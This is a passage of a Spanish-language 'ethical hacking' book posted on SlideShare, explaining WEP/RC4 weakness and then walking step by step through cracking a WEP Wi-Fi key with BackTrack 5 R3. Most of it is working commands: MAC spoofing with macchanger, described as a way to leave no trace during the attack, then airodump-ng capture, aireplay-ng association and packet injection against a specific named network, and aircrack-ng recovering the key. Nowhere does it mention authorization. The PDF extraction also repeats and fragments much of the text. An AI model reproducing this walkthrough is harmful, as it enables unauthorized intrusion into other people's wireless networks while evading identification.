SlideShare una empresa de Scribd logo
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 1
Libro de Et
Contacto: whitehat@gmail.com
Edición
Descubre como es el
LSCA, Carlos Alberto Castruita Rodríguez
Edición impresa en PDF protegida contra impresión y sobre escritura.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com
Edición patrocinada por WhiteHat México
el Arte del Hacking de una visión de un White Hat.
Por
Carlos Alberto Castruita Rodríguez
Edición Independiente © 2015
impresa en PDF protegida contra impresión y sobre escritura.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 2
Arte del Hacking de una visión de un White Hat.
Carlos Alberto Castruita Rodríguez
impresa en PDF protegida contra impresión y sobre escritura.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 3
Descubre desde cero como es Arte del Hacking de una visión de un White Hat.
El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de
vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un
nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o
soporte técnico en sistemas.
Autor: Carlos Alberto Castruita Rodríguez
Director de WhiteHat - México
Con 20 años de experiencia en el área sistemas.
Certificado Hellermann Tyton
Certificado 3com Networks
Ethical Hacker Certificado
Contacto: carlos.castruita@whitehatmexico.tk
Libro de Et
Contacto: whitehat@gmail.com
EL ENCRIPTADO WEP
Estoy casi convencido de
haya lidiado mínimamente con su router. No en vano, el término
siempre que debemos introducir la clave de nuestra Wi
Internet. Pues bien, ¿a qué nos r
trataré de explicar aquí.
Con el título de este artículo he dado la pista clave y es que
Equivalent Privacy, que en español sería Privacidad Equivalente a Cableado) es un sistema
de cifrado de información que permite encriptar los datos que viajan a través de sistemas
inalámbricos, es decir, lo que pasa a través de nuestra Wi
se pretende dar una cobertura o protección a los datos que circulan por nuestra
inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si
viajaran a través de un cable de red.
Pero he aquí que la cosa al principio pareció ir bien per
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com
EL ENCRIPTADO WEP
Diagrama de RC4
que las siglas WEP no sonarán a extraño para cualquiera que
haya lidiado mínimamente con su router. No en vano, el término
siempre que debemos introducir la clave de nuestra Wi-Fi para poder conectarnos a
Internet. Pues bien, ¿a qué nos referimos exactamente con WEP? Pues eso es lo que
Con el título de este artículo he dado la pista clave y es que WEP (acrónimo para
, que en español sería Privacidad Equivalente a Cableado) es un sistema
cifrado de información que permite encriptar los datos que viajan a través de sistemas
inalámbricos, es decir, lo que pasa a través de nuestra Wi-Fi. Mediante esta encriptación
se pretende dar una cobertura o protección a los datos que circulan por nuestra
inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si
viajaran a través de un cable de red.
Pero he aquí que la cosa al principio pareció ir bien pero se torció ¡!! ¿la razón? el
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 4
1
no sonarán a extraño para cualquiera que
haya lidiado mínimamente con su router. No en vano, el término WEP aparece casi
Fi para poder conectarnos a
eferimos exactamente con WEP? Pues eso es lo que
(acrónimo para Wired
, que en español sería Privacidad Equivalente a Cableado) es un sistema
cifrado de información que permite encriptar los datos que viajan a través de sistemas
Fi. Mediante esta encriptación
se pretende dar una cobertura o protección a los datos que circulan por nuestra red
inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si
¿la razón? el RC4.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 5
2
RC4 (River Cipher 4 o Ron’s Code 4 en honor a su creador Ron Rivest) es el algoritmo que
utiliza WEP para encriptar la información, el cual resulta ser muy rápido pero en
detrimento es simple, demasiado simple, tan simple que fue descartado como algoritmo
para altos niveles de seguridad.
Las redes encriptadas mediante WEP no son realmente seguras, pero a pesar de eso es la
tipo de cifrado muy popular hoy en día.
WEP fue uno de los primeros sistemas de cifrado para redes inalámbricas que salieron a la
luz de forma comercial, de hecho casi todos los routers de los ISP nos dan una clave para
encriptación WEP por defecto.
Pero dejemos de hablar de los problemas del WEP y hablemos un poco de sus entrañas. La
clave de la encriptación WEP está en la famosa contraseña que nos otorga nuestro
ISP cuando contratamos sus servicios. Esa contraseña es vista por cualquier dispositivo
como una secuencia de bits (unos y ceros) que puede tener un tamaño de 64 o 128,
dependiendo del nivel de seguridad. Con la secuencia de bits de la contraseña se
enmascara la información para que a ojos ajenos sea ilegible, pero que en cuanto aterriza
en un dispositivo que también dispone de dicha contraseña se descodifique y se trate con
normalidad.
De todo esto lo que realmente hay que entender es que el cifrado WEP es realmente
simple, tanto que hoy en día es relativamente sencillo el penetrar su seguridad.
Libro de Et
Contacto: whitehat@gmail.com
Descarga el BackTrack 5 R3
Deberemos generar un CD de BacTrack 5 R3.
Lo que necesitas:
• Un CD de BackTrack 5 R3.
• Un adaptador o tarjeta de red con capacidad de inyección de paquetes.
• Una red WiFi cercana.
Lo primero de todo es arrancar tu ordenador usando
gráfico.
Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T).
Y escribir el siguiente comando:
>> ESCRIBIR: Sudo –s
Estando ya como ROOT antes previamente escrito el password y estando ya con todos los
recursos del sistema a disposición.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com
BackTrack 5 R3 en un CD.
CD de BacTrack 5 R3.
BackTrack 5 R3.
Un adaptador o tarjeta de red con capacidad de inyección de paquetes.
cercana.
Lo primero de todo es arrancar tu ordenador usando BackTrack, preferiblemente en modo
Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T).
el siguiente comando: Sudo –s
s { INTRO } ( para poder accesar como ROOT)
Estando ya como ROOT antes previamente escrito el password y estando ya con todos los
recursos del sistema a disposición.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
al Hacking para entrenamiento sobre ataques informáticos.
Página 61
3
Un adaptador o tarjeta de red con capacidad de inyección de paquetes.
BackTrack, preferiblemente en modo
( para poder accesar como ROOT)
Estando ya como ROOT antes previamente escrito el password y estando ya con todos los
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 72
4
Pasando de usuario que en este caso es castruita pasamos a ROOT ósea administrador, así
teniendo todos los privilegios para poder trabajar.
Escribiremos el otro comando. Ifconfig
>> ESCRIBIR: Ifconfig { INTRO } ( con este comando podremos ver la configuración
y estatus de la tarjeta de red.)
Escribiremos el otro comando.
Airmon-ng
>> ESCRIBIR: airmon-ng { INTRO } (el modo de monitoreo)
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 8
5
El comando anterior te dirá cuál es tu tarjeta inalámbrica, lo nombres más comunes
son wlan0, ra0, eth0 ó eth1, cosas así por el estilo. Te darás cuenta de cuál es nombre de
tu adaptador de red.
El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir los
siguientes comandos:
Si tu tarjeta de red se llama wlan0, entonces los comandos serían:
- airmon-ng
- ifconfig
- macchanger
>> ESCRIBIR: airmon-ng stop wlan0 { INTRO } (Deshabilitamos el modo
Monitoreo)
Deshabilitamos la interface Wlan0 para poder después deshabilitar el dispositivo de red,
que es el dispositivo rt2800usb.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 96
Escribiremos el otro comando. ifconfig
>> ESCRIBIR: ifconfig wlan0 down { INTRO }
Con esta instrucción desconectamos la interface wlan0 del driver
Prosiguiendo con siguiente comando macchanger
>> ESCRIBIR: macchanger --mac 00:00:00:00:00:00 wlan0 { INTRO }
Dondequiera que veas (tarjeta de red) debes reemplazarlo con el nombre de tu tarjeta de
red. Nosotros hemos usado la MAC 00:11:22:33:44:55, pero tú puedes usar cualquiera
que se te ocurra.
Es importante ver que al poner el comando macccharger se concluya correctamente el
cambio de MAC ADRRESS. El mac de nuestra tarjeta de red usb que es fabricada por
EDIMAX, fue cambiada la mac por una de CIMSYS.
Porque el cambio de numero de serie de nuestra tarjeta de red o cambio de MAC. Para no
dejar rastro de nuestra identidad al momento del ataque al modem wifi. Nos aparece en
la imagen la sentencia “ NEW MAC: “ con nuestra mac falsa obteniendo una identidad
falsa del hardware que va a atacar.
Ahora que ya tenemos nuestra nueva mac adrress daremos de alta los servicios, para
empezar hacer el monitoreo.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 10
Escribiremos el siguiente comando. ifconfig
>> ESCRIBIR: ifconfig wlan0 up { INTRO } (damos de alta el servicio de nuestra
tarjeta de red)
>> ESCRIBIR: iwconfig mon0 { INTRO } ( nos muestra la configuración del monitor
o Mon0)
Ya que tenemos el servicio de la interface funcionando que es Wlan0 .
Nuestro siguiente comando es Airmon-ng, el cual ya una de las herramientas que
proporciona la suite de backtrack. Te recomiendo que tengas un cuaderno de apuntes y
copies los comandos para que puedas ir memorizando las líneas para cuando hagas
ataques en campo no te falle por falta de un comando o de error de escritura.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 11
78
Bueno ya estamos con las herramientas de backtrack con la cual empezaremos con
airmon-ng.
>> ESCRIBIR: airmon-ng start wlan0 { INTRO } (script diseñado para convertir
tarjetas inalámbricas en el monitor)
Este script puede ser usado para activar el modo de monitor inalámbrico interfaces.
También se puede utilizar para volver desde el modo de monitor para gestionados de
modo. Entrando en el comando airmon-ng sin parámetros mostrará el estado de
interfaces.
El siguiente comando te permitirá ver cuáles son las redes WiFi que hay a tu alrededor.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 12
9
Ya que ejecutamos el comando Airmon-ng , procederemos con el segundo comando que
es Airodump-ng.
Te muestro su sintaxis a continuación.
airodump-ng <opciones> <interface>[,<interface>,...]
Opciones:
--ivs : Graba únicamente los IVs capturados
--gpsd : Usa GPSd
--w <nombre archivo>: Nombre del archivo donde guardar las capturas
-write : Lo mismo que --w
--beacons : Guardar todas las balizas o beacons en el archivo
--netmask <máscara de red> : Filtrar APs por máscara
--bssid <bssid> : Filtrar APs por BSSID
Por defecto, airodump-ng va saltando alrededor de los canales 2.4Ghz.
Puedes capturar en un canal específico usando:
--channel <canal>: Capturar en un canal específico
--band <abg> : Banda en la que actuará airodump-ng
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 13
10
--cswitch <método> : Saltar de canal con este método:
0 : FIFO (opción por defecto)
1 : Round Robin
2 : Saltar al último
-s : Lo mismo que --cswitch
>> ESCRIBIR: airodump-ng mon0 { INTRO }
Airodump-ng se usa para capturar paquetes wireless 802.11 y es útil para ir acumulando
vectores de inicialización IVS con el fin de intentar usarlos con aircrack-ng y obtener la
clave WEP.
Va a salir una lista con todas las redes inalámbricas alrededor, donde dice el BSSID (MAC
del router que da la señal), PWR (Poder de señal), CHN (Canal en que se encuentra la red),
ENC (Es el tipo de encriptación) y ESSID (Nombre de la red inalámbrica). Te mostrare abajo
la tabla de los campos que usa Airodump-ng.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 14
9
11
11
Campo Descripción
BSSID Dirección MAC del punto de acceso.
PWR Nivel de señal. Su significado depende del driver que usemos, pero cuanto
mayor sea el PWR más cerca estaremos del AP o del cliente. Si el PWR es -1,
significa que el driver no soporta la detección del nivel de señal. Si el PWR es -1
para algunos clientes (stations) es porque los paquetes proceden del AP hacia
el cliente pero las transmisiones del cliente se encuentran fuera del rango de
cobertura de tu tarjeta. Lo que significa que solo escuchas la mitad de la
comunicación. Si todos los clientes tienen PWR -1 significa que el driver no
tiene la cpacidad de detectar el nivel de señal.
RXQ Calidad de recepción calculada a través del porcentaje de paquetes
(management y paquetes de datos) recividos correctamente en los últimos 10
segundos. Mira la nota para una explicación más detallada.
Beacons Número de “paquetes anucio” o beacons enviadas por el AP. Cada punto de
acceso envia alrededor de diez beacons por segundo cuando el rate o
velocidad es de 1M, (la más baja) de tal forma que se pueden recibir desde
muy lejos.
# Data Número de paquetes de datos capturados (si tiene clave WEP, equivale
tambien al número de IVs), incluyendo paquetes de datos broadcast (dirigidos
a todos los clientes).
#/s Número de paquetes de datos capturados por segundo calculando la media de
los últimos 10 segundos.
CH Número de canal (obtenido de los “paquetes anuncio” o beacons).
Nota: Algunas veces se capturan paquetes de otros canales, incluso si
airodump-ng no está saltando de canal en canal, debido a interferencias o
solapamientos en la señal.
MB Velocidad máxima soportada por el AP. Si MB = 11, es 802.11b, si MB = 22es
802.11b+ y velocidades mayores son 802.11g. El punto (despues del 54) indica
que esa red soporta un preámbulo corto o “short preamble”.
ENC Algoritmo de encriptación que se usa. OPN = no existe encriptación
(abierta),”WEP?” = WEP u otra (no se han capturado suficientes paquetes de
datos para saber si es WEP o WPA/WPA2), WEP (sin el interrogante) indica
WEP estática o dinámica, y WPA o WPA2 en el caso de que se use TKIP o
CCMP.
CIPHER Detector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 15
AUTH El protocolo de autenticación usado. Puede ser MGT, PSK (clave
precompartida), o OPN (abierta).
ESSID Tambien llamado “SSID”, que puede estar en blanco si la ocultación del SSID
está activada en el AP. En este caso, airodump-ng intentará averiguar el SSID
analizando paquetes “probe responses” y “association requests” (son paquetes
enviados desde un cliente al AP).
STATION Dirección MAC de cada cliente asociado.
Lost El número de paquetes perdidos en los últimos 10 segundos.
Packets El número de paquetes de datos enviados por el cliente.
Probes Los ESSIDs a los cuales ha intentado conectarse el cliente.
Cuando veas la red que deseas hackear, pulsa Ctrl + C para detener el escaneo quedando
la lista final. Resalta la fila perteneciente a la red de interés, y tomar nota de dos cosas: su
BSSID y su canal (en la columna CH), como se ilustra a continuación. Es evidente que la red
que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni
ninguna otra cosa.
Ahora vamos a ver lo que está pasando con la red que hayas elegido y capturar esa
información en un archivo.
Subraye la ESSID con la que vamos trabajar en este libro que es INFINITUM2ABB72.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 16
1413
Vemos que ya tenemos un wifi wep, cuyos datos son los siguientes:
ESSID: INFINITUM2ABB72
ENC: WEP
CHANEL: 1
BSSID: 00:24:17:81:B4:0D
PWR: -78
Nos indica PWR, que nuestro wifi que deseamos atacar esta un poco retirado, y que nos
puede tardar un poco mas de tiempo en obtener la cantidad de paquetes que
necesitamos acumular para obtener la contraseña.
>> ESCRIBIR: airodump-ng -c (canal) -w (nombre del archivo) --bssid
(bssid) mon0 { INTRO }
Entendemos ya con nuestros datos que la red que deseas hackear es INFINITUM2ABB72,
que su canal es 1, que deseamos ponerle al archivo de escritura de los datos como
‘hackingwifi’ y que el bssid es 00:24:17:81:B4:0D, entonces el comando sería:
airodump-ng -c 1 -w hackingwifi --bssid 00:24:17:81:B4:0D mon0
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 17
Ahora ya estas capturando datos!!!!, ahora fíjate que hay una columna que dice DATA,
estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como
mínimo debes capturar unos 20,000 paquetes. Yo recomiendo 30,000.
Notarás que puede ir muy lento, esto significa que ninguna persona está utilizando la red
en el momento. Entonces no está generando tráfico y te podría llevar demasiado tiempo
llegar a los 20,000 paquetes. Por suerte tú mismo puedes inyectarle tráfico a la red y para
eso es el comando siguiente.
Abre una nueva ventana de la consola y escribe el siguiente comando: Aireplay-ng.
SINTAXIS: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid)
mon0
-a es el bssid de la red que estamos atacando.
-h es la mac falsa que le diste a tu tarjeta de red al principio.
-e es el nombre de la red que estamos atacando.
>> ESCRIBIR: aireplay-ng -1 0 -a 00:24:17:81:B4:0D -h 00:11:22:33:44:55
- e INFINITUM2ABB72 mon0 { INTRO }
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 18
15
Después de introducir el comando deberían aparecer 4 líneas de códigos y la final debe
decir que la conexión ha sido exitosa (“Association successful”), esto significa que
estas conectado en capa 2 del router de la red que estás atacando.
Si por alguna razón no te puedes conectar, entonces las causas pueden ser las siguientes:
• La red que quieres atacar está muy lejos.
• Tu tarjeta de red no puede hacer inyección de paquetes.
• El router que quieres atacar tiene seguridad para evitar este tipo de ataques.
Ahora para inyectarle el tráfico introduce el siguiente comando: Aireplay-ng
>> ESCRIBIR: aireplay-ng -3 -b 00:24:17:81:B4:0D -h 00:11:22:33:44:55
mon0 { INTRO }
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 19
Dónde:
-b es el bssid de la red que estamos atacando.
-h es la MAC falsa que le dimos a tu tarjeta de red inalámbrica.
Verás que se empezaran a inyectar paquetes, si vas a ver a la otra terminal donde estás
capturando los paquetes te darás cuenta que la columna de DATA ahora avanzará mucho
más rápido.
Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún
tiempo. Es cuestión de que dejes el ordenador trabajar y vayas a dar una vuelta hasta que
data llegue a 30,000 paquetes.
Al llegar a los 30,000 paquetes o IVs pulsaremos CTRL+ C, para frenar la operación.
A continuación escribiremos el comando: Dir
>> ESCRIBIR: dir { INTRO }
Nos muestra el directorio una serie de archivos generados con el nombre de archivo
hackingwifi + 01, con extensiones .cap, .csv, kismet.csv, kismet.netxml.
Seleccionamos el archivo hackingwifi-01.cap para poder obtener la contraseña del wifi
atacado.
EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING
Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.
Contacto: whitehat@gmail.com Página 20
1617
Ejecuta el siguiente comando para recuperar que los datos que hemos recogido:
SINTAXIS: aircrack-ng -b (bssid) (nombre de archivo-01.cap) O
aircrack-ng (nombre de archivo-01.cap)
>>ESCRIBIR: aircrack-ng -b hackingwifi-01.cap { INTRO }
Si no has recopilado suficientes datos, aircrack presentará un error y te dirá que vuelvas a
intentarlo con más datos. Si tienes éxito, se verá así,
KEY FOUND [ 87:F2:71:32:E6 ]

Más contenido relacionado

La actualidad más candente

Introducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricasIntroducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricas
Marcos Blanco Galán
 
Seguridad en redes WiFi
Seguridad en redes WiFiSeguridad en redes WiFi
Seguridad en redes WiFi
Pablo Garaizar
 
Seguridad en Redes Inalámbricas
Seguridad en Redes InalámbricasSeguridad en Redes Inalámbricas
Seguridad en Redes Inalámbricas
Anna Vega
 
Seguridad en redes inalambricas
Seguridad en redes inalambricasSeguridad en redes inalambricas
Seguridad en redes inalambricasEDVV
 
Seguridad Inalámbrica
Seguridad InalámbricaSeguridad Inalámbrica
Seguridad Inalámbricasegarreta
 
Guía de Seguridad en Redes Inalámbricas
Guía de Seguridad en Redes InalámbricasGuía de Seguridad en Redes Inalámbricas
Guía de Seguridad en Redes Inalámbricas
ESET Latinoamérica
 
Seguridad Wifi
Seguridad WifiSeguridad Wifi
Seguridad Wifi
Chema Alonso
 
Seguridad inalambrica
Seguridad inalambricaSeguridad inalambrica
Seguridad inalambrica
haurbano
 
Red Wifi con políticas de seguridad
Red Wifi con políticas de seguridadRed Wifi con políticas de seguridad
Red Wifi con políticas de seguridad
iesgrancapitan.org
 
Se puede subir
Se puede subirSe puede subir
Se puede subirthelatin
 
Seguridadwifi
SeguridadwifiSeguridadwifi
SeguridadwifiOscar Fdo
 

La actualidad más candente (14)

Encriptacion[1]
Encriptacion[1]Encriptacion[1]
Encriptacion[1]
 
Introducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricasIntroducción a la seguridad en redes inalámbricas
Introducción a la seguridad en redes inalámbricas
 
Seguridad en redes WiFi
Seguridad en redes WiFiSeguridad en redes WiFi
Seguridad en redes WiFi
 
Seguridad en Redes Inalámbricas
Seguridad en Redes InalámbricasSeguridad en Redes Inalámbricas
Seguridad en Redes Inalámbricas
 
Seguridad en redes inalambricas
Seguridad en redes inalambricasSeguridad en redes inalambricas
Seguridad en redes inalambricas
 
Seguridad Inalámbrica
Seguridad InalámbricaSeguridad Inalámbrica
Seguridad Inalámbrica
 
Guía de Seguridad en Redes Inalámbricas
Guía de Seguridad en Redes InalámbricasGuía de Seguridad en Redes Inalámbricas
Guía de Seguridad en Redes Inalámbricas
 
Vulnerabilidades web
Vulnerabilidades webVulnerabilidades web
Vulnerabilidades web
 
Seguridad Wifi
Seguridad WifiSeguridad Wifi
Seguridad Wifi
 
Seguridad inalambrica
Seguridad inalambricaSeguridad inalambrica
Seguridad inalambrica
 
Red Wifi con políticas de seguridad
Red Wifi con políticas de seguridadRed Wifi con políticas de seguridad
Red Wifi con políticas de seguridad
 
Se puede subir
Se puede subirSe puede subir
Se puede subir
 
Firewalls
FirewallsFirewalls
Firewalls
 
Seguridadwifi
SeguridadwifiSeguridadwifi
Seguridadwifi
 

Similar a Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5

Propietario
PropietarioPropietario
Propietario
IsraelIvanGarcaLpez
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguez
laura flures
 
Servicios en red
Servicios en redServicios en red
Servicios en redprades17
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensas
Roberto Garcia Amoriz
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
Rober Garamo
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wireless
ruben0909
 
Manual de pentesting_sobre_ataque_web_python_hulk
Manual de pentesting_sobre_ataque_web_python_hulkManual de pentesting_sobre_ataque_web_python_hulk
Manual de pentesting_sobre_ataque_web_python_hulk
White Hat Mexico
 
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
Ramiro Francisco Helmeyer Quevedo
 
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
ramirohelmeyer
 
Ataque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-FiAtaque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-Fi
José García
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
Waldir Nuñez Francia
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinajei-inform-95
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinajeisonalexander
 
Cómo saber si te están robando el WiFi
Cómo saber si te están robando el WiFiCómo saber si te están robando el WiFi
Cómo saber si te están robando el WiFi
Ivan Bedia García
 
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmcia
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O PcmciaLo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmcia
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmciaitm
 
El ladrón en casa me están robando mi conexión wi fi f
El ladrón en casa me están robando mi conexión wi fi fEl ladrón en casa me están robando mi conexión wi fi f
El ladrón en casa me están robando mi conexión wi fi fTensor
 

Similar a Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5 (20)

Propietario
PropietarioPropietario
Propietario
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguez
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
Servicios en red
Servicios en redServicios en red
Servicios en red
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensas
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wireless
 
Manual de pentesting_sobre_ataque_web_python_hulk
Manual de pentesting_sobre_ataque_web_python_hulkManual de pentesting_sobre_ataque_web_python_hulk
Manual de pentesting_sobre_ataque_web_python_hulk
 
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
Ramiro Francisco Helmeyer Quevedo - ¿Cómo Proteger Tu WiFi?
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
Ramiro Helmeyer - ¿Cómo Proteger Tu WiFi?
 
Ataque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-FiAtaque y defensa en redes Wi-Fi
Ataque y defensa en redes Wi-Fi
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
 
Cómo saber si te están robando el WiFi
Cómo saber si te están robando el WiFiCómo saber si te están robando el WiFi
Cómo saber si te están robando el WiFi
 
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmcia
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O PcmciaLo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmcia
Lo Primero Que Hacemos Es Con Una Tarjeta Wireless Pci O Pcmcia
 
El ladrón en casa me están robando mi conexión wi fi f
El ladrón en casa me están robando mi conexión wi fi fEl ladrón en casa me están robando mi conexión wi fi f
El ladrón en casa me están robando mi conexión wi fi f
 

Último

Diapositiva Herramientas Web, Tema Web 3.0.pptx
Diapositiva Herramientas Web, Tema Web 3.0.pptxDiapositiva Herramientas Web, Tema Web 3.0.pptx
Diapositiva Herramientas Web, Tema Web 3.0.pptx
erick502105
 
